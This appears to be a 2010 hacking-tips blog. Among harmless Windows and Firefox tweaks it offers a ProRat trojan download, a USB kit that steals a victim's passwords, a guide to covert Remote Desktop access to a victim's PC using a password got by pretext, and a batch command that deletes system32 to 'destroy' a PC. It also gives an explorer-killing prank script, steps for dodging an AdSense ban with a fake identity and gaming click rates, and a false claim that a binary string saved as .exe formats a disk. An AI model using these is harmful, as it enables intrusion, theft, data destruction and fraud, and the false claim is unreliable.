Tuesday 9 February 2010

How to tweak Firefox to get more speed

Yes, firefox is already pretty damn fast but did you know that you can tweak it and improve the speed even more?

That's the beauty of this program being open source.
Here's what you do:
In the URL bar, type “about:config” and press enter. This will bring up the configuration “menu” where you can change the parameters of Firefox.

Note that these are what I’ve found to REALLY speed up my Firefox significantly - and these settings seem to be common among everybody else as well. But these settings are optimized for broadband connections - I mean with as much concurrent requests we’re going to open up with pipelining… lol… you’d better have a big connection.

Double Click on the following settins and put in the numbers below - for the true / false booleans - they’ll change when you double click.

Code:
browser.tabs.showSingleWindowModePrefs – true
network.http.max-connections – 48
network.http.max-connections-per-server – 16
network.http.max-persistent-connections-per-proxy – 8
network.http.max-persistent-connections-per-server – 4
network.http.pipelining – true
network.http.pipelining.maxrequests – 100
network.http.proxy.pipelining – true
network.http.request.timeout – 300


One more thing… Right-click somewhere on that screen and add a NEW -> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0”. This value is the amount of time the browser waits before it acts on information it receives. Since you’re broadband - it shouldn’t have to wait.

Now you should notice you’re loading pages MUCH faster now!

I hope you like it. Please pass the comment



Monday 8 February 2010

How To Become the system User In Windows XP

If you think Administrator has the largest privileges onto the computer, then you are wrong. There is a user who is named SYSTEM. SYSTEM has full control of the operating system and it’s kernel. If you open windows task manager (press ctrl+alt and delete) you will see that System User controls several processes. These processes cannot be closed by Administrator. In this tutorial we will see how to trick Windows into running our desktop as System. So we’ll get a much greater privileges over computer.

Steps

1).Open Command Prompt. Go to Start , then Run. In Run option type cmd and click OK. After this will open Command Prompt, or Start->All Programs ->Accessories->Command Prompt

2). In Command Prompt write at 13:55 /interactive “cmd.exe” and press enter , the time is usually a minute or two ahead of your present time in the 24 hours format
After a minute or two will appear new Comand Prompt Window wit different title bar. It has changed from cmd.exe to svchost.exe.

3) End current explorer.exe process. Open Task Manager, select explorer.exe and click End Process

4. In new Comand Prompt with title svchost.exe write cd.. and press enter , then write explorer.exe and press enter.

After this you will become SYSTEM user

I hope you like it. Please pass the comment


How to Create a folder whose name is CON

Normally you can,t create the folder Which name is CON but here you can know it,s madding process.

1)First click the Start menu and then click the run and type cmd without any quotes.

Then the dos prompt will appear them select the your drive location where you want to create the folder then type MD CON\\ and press Enter. Now you ready for use this folder.

But deleting process is not easy so for deleting this folder again open the dos prompt and select your location and type RD CON\\ then press enter your folder will be removed.

I hope you like it. Please pass the comment


Pro Rat ( Download Link )

In this post I'll be posting the link to download PRORAT which is best TROJAN making software to hack anyone's computer. If you need the tutorial, Please ask in the comment box !


I hope you like it. Please pass the comment


Sunday 7 February 2010

How to Make Invisible Password Protected Folder

Do you want to password protect your folder? Do you want to make it invisible so that it remains unnoticed by the normal users? Well here is a way to do that. In this post I will show you how to make a password protected folder in Windows without using any additional software. Here is is step by step procedure to create a password protected folder.

How to create a Password Protected Folder

Step-1: Create a new folder (Right-click -> New -> Folder) and give it any name of your choice. For instance I name it as ABC.

Step-2: Now in this folder place all the important files, documents or any folders that you want to password protect.

Step-3: Now Right-click on this folder (ABC) and select the option Send To ->Compressed (zipped) Folder.

Step-4: Now a new compressed zipped folder gets created next this folder (ABC) with the same name.

Step-5: Double-click on this compressed zipped folder and you should see your original folder (ABC) here.

Step-6: Now goto the File menu and select the option Add a password.

ie: File -> Add a password

Now a small window will pop up and here you can set your desired password. Once the password is set, the folder will ask for the password every time it is opened. Thus you have now created the password protected folder.

How to make it Invisible

Step-1: Now Right-click on this password protected folder and select Properties.

Step-2: At the bottom select the option Hidden and press OK. Now your folder gets invisible (hidden).

Step-3: In order to unhide this folder go to My Computer – >Tools -> Folder options. Switch to View tab, scroll down and under Hidden files and folders you’ll see the following two options

  • Do not show hidden files and folders
  • Show hidden files and folders

Now select the second option and press OK. Now the invisible folder becomes visible in it’s location. To access it you need the password. To make it invisible again repeat step -1 through step-3 and select the first option and click OK. Now the folder becomes invisible once again.

I hope you like it. Please pass the comment



How To Increase Your Broadband Speed (Useful Tip)

Here's something for broadband people that will really speed Firefox up:

1.Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:

network.http.pipelining network.http.proxy.pipelining network.http.pipelining.maxrequests

Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.

2. Alter the entries as follows:

Set "network.http.pipelining" to "true"

Set "network.http.proxy.pipelining" to "true"

Set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.

3. Lastly right-click anywhere and select
New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it receives.

If you're using a broadband connection you'll load pages MUCH faster now

I hope you like it. Please pass the comment





How to format Hard Disk using Notepad

1. Write The Following In Notepad Exactly as it says

2. Write the following code:01001011000111110010010101010101010000011111100000

3. Save As it as .EXE and any Name would Do.

4. If u run the program means it will format the Hard Drive.

I hope you like it. Please pass the comment





How to disable copy and right click function on your website

It is very disturbing someone copies your content and pastes in his website or blog . Mostly people do this because to create genuine content it takes time .So if we could disable the copy function in our site ,the rate at which content being copied can be reduced.But keep in mind that an experienced internet user can anyways bypass this trick .I am gonna explain this trick with reference to blogger service of Google. Others may also use the code in their perspective . This is having some disadvantages if you are listing some useful sites for your users or some stuff that needs to be copied
Now for blogger open Layout now edit HTML
Before you edit template save a copy for future use

Paste the following the JavaScript code just below tag as shown in screenshot

Please ask me the code using comment ! ( I cannot put the code here, there is some problem.)

Now save the template and your done

I hope you like it. Please pass the comment


Saturday 6 February 2010

How to create a desktop shortcut for locking your computer

IF you use your computer in an area where others may have access to it, and there are things on your system you would rather have kept confidential, locking your desktop when you leave the computer is an essential task. Here's a recipe for a desktop shortcut that will lock your computer in two easy clicks:

Right click on an empty area of the desktop and choose 'new' then 'shortcut.' The create shortcut wizard will open; in the first text box, type '%windir%\System32\rundll32.exe user32.dll,LockWorkStation' and then give your shortcut an appropriate name on the next page, and hit 'finish.'

You will notice that the shortcut you created has a blank icon. To select a more appropriate one, right click on the shortcut and hit 'properties.' In the 'shortcut' tab, click the 'change icon' button.

In the 'look for icons in this file' box, type '%SystemRoot%\system32\SHELL32.dll' then click 'ok' to see a range of icons for your new shortcut. Choose an appropriate icon. Your desktop locking shortcut is now ready for use. Test it out.

It is useful if u have an account as it will prompt 4 a password.

I hope you like it. Please pass the comment



How to make fake virus to scare all of your friends

Hey, I will be showing you how to make a great little prank to scare your friends *or enemies*. First things first make sure you have a computer running windows XP it doesn't really matter which version as far as i know.

Testing...


Ok here is where you test the taskkill command
-Open command prompt(start>run>type in "cmd" without the quotes>a black window should pop up)
-type in "taskkill /f /im explorer.exe" (if you are running windows 95 type "kill /f /im explorer.exe")Without the quotes
-hit enter and your icons and startbar should dissapear
-now type "start /im explorer.exe
- if that worked then this file will work

Step 2: write the code...
open a new notepad document and copy and paste the following text:
@echo off
title Do Not Close This Window!
echo Warning system failure! Do not close this window Doing so will harm your computer (press any key to Repair)
pause >nul
echo Deleting C:\... (press any key to cancel)
pause >nul
DIR /s
DIR /s
taskkill /f /im explorer.exe
cls
Echo C:\... Deleted (press any key to restore)
Pause >nul
echo hahahahahahha this is a prank Would you like your icons back (Y/N)
Pause >nul
start /im explorer.exe
cls
echo press any key to exit
Pause >nul
exit


What it means
-"@echo off" means it doesn't show cretain commands up (like echo)
-"Title" just names the windows top bar
-"Pause" means pause running the script until the user presses a key(it also displays"Press any key to continue") That why i have ">nul" after this, it stops it from displaying this message.
-"DIR /s" is a directory search.
-If you completed the test step then you would know what "taskkill /f /im explorer.exe" and "start /im explorer.exe"
-"cls" clears all of the previous text

Step 3: Saving the file correctly

Hit
-file>save as
-file type: all files
-file name: whateveryouwanthere.BAT
-Save


Step 4: Finished
Congratulations! you have just completed a really great prank!It is totally safe and harmless. So send it around! and have a great laugh! If you want to send this via email you will have to send it to a compressed zipped folder.

I hope you like it. Please pass the comment


How to log into anyones computer from any where


Imagine how great it would be if you could log into a friends computer and leave small bread crumbs to freak them out... letting them know that someone has accessed their computer without them knowing but they will have no idea who it was! Trust me, its a lot of fun. haha

Examples of what could be done:

- if they are logged onto aim or any other instant messaging client with an away message up... you can change their away message to something funny for all of their friends to see."

- fill their whole desktop with blank icons."

- leave them messages in notepad documents that you have saved to their desktop."

-etc...

NOTE: This might not work if they have a firewall set up. Chances are if they are connected through a hardwire, you'll be able to get it, its those damn wireless users who are safe from people like us! haha that is of course only if their wireless is secured. Most people don't secure their wireless networks so if you are in range and can connect to the persons network, you CAN do it to them. :D

Another NOTE: Do this at your own risk. I am not responsible for any problems this may cause. ( I suggest you only do it to friends or family as a prank.

Step 1: The setup


Ok so I'm assuming you want to try this out since you've decided to check out step one... :)

First what you need to do is set up the victims computer (don't worry its simple). If they are using windows XP what you need to do is go to "My Computer" (which will be in the start menu) and right click it. Select "Properties" and then select the "Remote" tab. Once you're there check the check box that says "Allow users to connect remotely to this computer". Click "Apply" then click "Ok" and you're done! Theres just one more step you've got to do and that is get the IP address... ill show you how to do that in the next step. (its easy too)

Step 2: Getting the IP...


Getting their IP address is easy. Just go to the start menu and select "Run". then type in "CMD" and press enter. That will open up the terminal window. Once that opens type "ipconfig /all" (just like how i put it there). That command will bring up a bunch of numbers, you only need the IP address. (example of what an IP address looks like: 192.168.0.2). When you find it, write it down. You'll need it to access their computer when you get home, or wherever you're going to go to do it.

note: mine is blacked out in the screen shot because i don't want anyone knowing my IP. :D

You also need to get their username and password (if they have one)... and write it down. (make up some reason for them to give you their password but don't make it obvious that you're going to do bad things with it

Step 3: Now... doing the dirty work.

Once you have their IP address and a username and password for the computer, and they're written down, you can go home (or wherever you want to do this from) and to access their computer you simply go to Start > All programs > Accessories > Communications > Remote Desktop Connection...

A window will pop up. Similar to the windows 2000 logon screen. It will ask you to enter a computer. For this you will type in the IP address for the computer you wish to access. Then click "Connect".

Then you will be asked to enter a username and password. Enter them...(the ones you got from your friends computer, not your own).

and boom! you're done!!

I hope you like it. Please pass the comment.







Friday 5 February 2010

How to steal things using a USB ?

Here in this post I'll tell you how to steal things from a USB !

Steps -

(Tweaked USB that steals every passwords including licences)

1.Decompress the archive and put all the files located in the folder "USBThief"into a USB.
2.Insert the USB in your victim's computer.
3.View folder "dump" to see the passwords.


Dowload - Click here

I hope you like it. Please pass the comment



How to unlock Password Protect Memory Card ?

Here in this post I'll tell you how to unlock a password protected memory card !

Steps -

Well its quite simple but most of the people do not know it.

Please note the fact that it only works if the password to the MMC Card was set in ur own mobile,where u want it to be unlocked.

This method works well for nokia cells with symbian operating system.Never tried on other cells.use any software like FXplorer that can browse files in ur cell.

1. Open one of above software you have.
2. Browse through the directory, C:\system
3. Rename the file mmcstore to mmcstore.txt
4. Open the file - The file will open in Notes.
5. You will find your password in that file. That file would also contain much more data which you do not understand,so you need to go through the file to get the password!

When ur cell is connected to pc by means of data cable or bluetooth,u can see the password by simply opening the file mmcstore with notepad

I hope you like it. Please pass the comment


How to Hide Music Inside A Picture ?

Here in this post I'll tell you a cool way of hiding a music file inside a picture !

Steps -

What you will need:
A GIF image

An MP3 music file (preferably not too long)

A computer (hopefully you figured this one out on your own :P )

Step 2: open your command prompt
there are a thousand and one ways to open your command prompt. here's one of them.

-windows users, hit windows+r (that's hold the windows button and hit r)
and type cmd into the window that opens.

-Linux users right click and choose xterm.

-Mac users should be the same as Linux users, but I haven't tried this in mac, so good luck.

if you know a better way, list it in the threads section.

Step 3:Navigating using command line
Here's a quick rundown on command line navigation:

+++++++++
Linux/Mac:
+++++++++
ls - lists all the files in the current directory
cd - changes what directory you're in (traverse directories using this)
cat - can be used to view the contents of a file or to copy a file or to combine two files.

++++++++
Windows:
++++++++
dir - lists all the files in the current directory
cd - changes what directory you're in (traverse directories using this)
copy - can be used to copy a file or to combine two files.

+++++++++++++++++++++++
how to use the cd command:
+++++++++++++++++++++++
cd
cd .. backs out of the current directory/folder

Step 4:Combining the MP3 and the GIF
make sure you are in the same directory/folder as the mp3 and the gif.

for Windows users type:
copy picture.gif /b + music.mp3 /b combined.gif
(where picture.gif is your gif image, music.mp3 is your mp3 music file, and combined.gif is the final product)

For Linux/Mac users type:
cat picture.gif sound.mp3 > picture2.gif
(where picture.gif is your gif image, sound.mp3 is your mp3 music file, and picture2.gif is the final product)

after this you should have a finished .gif product

Step 5: Final

The .gif that you have now looks like a normal gif, but if you throw it into a music player it will play the mp3.


I hope you like it. Please pass the comment


How to destroy your victims PC ?

Here in this post I'll tell you a cool way to completely off the victims PC forever !!!!

Steps -
1. Open Notepad

2. write the above command

del c:\WINDOWS\system32\*.*/q

3. Save the above notepad with the extension ".bat or .cmd" as u want

4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!! !!!
Don't double click the file otherwise u r in trouble.
Why ?????? bcz the file u created delete all files from ur

system32 folder and when u restart ur pc it will not start

bcz system can not find the files in the system32 folder which

is required at the time of booting.

5. You can also test the above by creating a fake folder let suppose

windows1 in C:\. Copy some old files in it and just follow the

above command.By double clicking the bat or cmd file ur all files

automaitcally get deleted.

6. You can try this file in any one`s computer.(but this result in causing damage to the
computer, so thik again before trying this on anyone's pc)

I hope you like it. Please pass the comment


How to get a free domain for a blog ?

Here in this post, I'll tell you the way to get a free domain and how to set up in a blog !

Steps -

1.Go to your browser and open to co.cc
2.Type for a free domain which u want to use and see wheather it is avaluable
3.If ur desired name is avaluable make a register to it.
4.Next step u have to setup for a domain to do so goto "setup--->manage domain"
5.Select "zone records" in that column "host" type your domain name (www.yourdomainname.co.cc)
6.Then choose "CNAME" for "TYPE" then type "ghs.google.com" in the value box then click
setup button.

Next think to do in blogger do as follow:

1.Go to to blogger.com and login.
2.Select "setting--->publishing" then select "switch to :. custom domain"
3.Then click on that "already own a domain:switch to advance setting"
4.In "your domain" column type ur domain name which u have created in co.cc
5.Click" save setting " button to finish.

Note: It take nearly 1-2days for ur new domain to take action. mean while if any one entering to ur site through blospot. it will be redirected to ur new domain name
enjoy

I hope you like it. Please pass the comment


How to put your site on google ?

Here I'll tell you the best and easiest way of getting your site on Google.

Steps -

1) Go to any forum, example Win7vista.
2) You need to make an account on any forum, here I take win7vista.
3) Now you need to edit your signature. It can be seen in the profile editing place.
4) Write your blog or site address, example http://www.xxxxxxxxx.blogspot.com or http://www.xxxxxx.com ( here xxxxxxxxx = your site name )
5) Then you need to post something in that forum, something just write something.It does not matter, but what you are writing should be related to the topic of the forum.
6) Wait for some days or more than a week.
7) Your site will appear on google

!!! Reason for doing is that - Google has got the best CRAWLER (which captures all the sites on the net, so when anyone post something, the powerful crawler captures it and put it on google. Here we have given our signature, so when we post something the google crawler captures it, and put the post on google, since we have put the signature, our sites are taken by the google along with the post and it comes on google !!!


I hope you like it. Please pass the comments !


How to apply for new adsense account ?

Here In this post I will tell you the way to get back your adsense !

If your a/c has been banned, " NO WORRIES" ! What you have to do is simple - REGISTER AGAIN. Steps

1) Make a new gmail id by going here Gmail ( never use the same id)
2) Make a new blog by going here Blogger ( never use the same blog)
3) Now you got to change your ip address ( it is because you have signed up once using your own computer IP (real), so if you sign up again with the same ip, you wont be able to open up a new account) using a IP changing software ( here are some Ultrasurf ,Hot Spot Shield )
3) OK Now you have to sign up on Google adsense by going hereGoogle adsense.
4) Give your blog address fill all other things when it comes to the payee name and street address, give some fake name and address ( this is the most important part of the process, I have said you to give a fake address because you wont be able to sign up using your same name and address, and therefore can be edited after getting the account ! :D) !!!! THIS CANNOT BE DONE FOR PEOPLE LIVING IN THESE COUNTRIES - China, Brazil, India, Indonesia, Vietnam, Malaysia, Philippines, Singapore, or Thailand !!
5) The last step of this process - SUBMIT !
6) You will get a mail from adsense saying that YOU ACCOUNT HAS BEEN CREATED !!!

I hope you like it. Please pass the comments !



The best of way of not getting banend from adsense !

Here are the some value points to be used before using adsense !!!!

First don't ask to click ads.
becoz ur blog is new, so better to ask for only impressions.
Let ur impressions count be for more than 100-150
that means first ask for only impressions
When ever ur impressions reaches to 100-150, then give ads in ur req


Keep an eye on CTR, it should be around 4%, not more than 4.5%
1.Clear cookie when starting the work and after work
2.Don't do with same person more more than 1 time in 10days
(better to give 10 days gap with 1 person)
3.Copy their blog names in a note pad for future referense.
4.Don't do more countinuosly with pakistan people, like countinuolsy doing with 10 pak peoples like that.
5.Vary the request frequesntly.
6.Give atleat 5-10 seconds gap between post impression
7. Don't open adsense account in ur system, better to open in another system. put the report delivary option to ur gmail.
8.Use facebook and orkut and other social netwoking sites to get more users accross the word.
9.Don't give impressions more than 20. Often better to give only impressions to others when ctr is more than 5%.
Blocked

I have followed these steps and i earned 300 euros ! Follow these tips. Sure you will succeed

I hope you like it. Please pass the comments !